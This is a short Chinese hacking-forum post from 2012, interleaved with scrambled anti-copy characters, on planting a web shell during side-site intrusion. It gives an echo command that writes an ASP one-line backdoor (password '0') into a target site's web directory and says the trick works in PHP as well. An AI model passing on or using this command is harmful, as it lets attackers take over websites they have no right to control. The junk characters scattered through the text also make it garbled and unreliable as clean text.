在旁注过程中,可以执行cmd而权限又比较低的情况下,有时候可以用这个方法帮你拿下目标站。$ x [3 i# Z# T% B$ z4 H& A! W& D
/ [7 |! R5 l# p) h
命令格式' M, c% x9 [$ x) ~3 b B6 E8 d
* g3 c) L0 L, [; F5 JEcho 语句 >目标站绝对目录
5 ]/ u5 t' W' n. Y- K4 S* |
# r2 C9 A& t% N5 A, d# e; D例如:
+ [& l, h( f3 U+ }* K, q; s$ I3 u; C2 o. w: i7 U& u
echo ^<^%execute request("0")%^> >D:\03389.com\wwwroot\YingMu.asp
$ v; r% y6 O5 @% K$ G. \1 \6 z" m4 G. g/ G6 n
这样访问目标站的目录下就会生成一个密码为0的asp的一句话,此方法在PHP等脚本语言均适用,大家灵活发挥。0 n: q/ }& K6 k: j5 p) \6 S6 d$ F
|
发表于 2012-9-23 14:40:24
收藏
支持
反对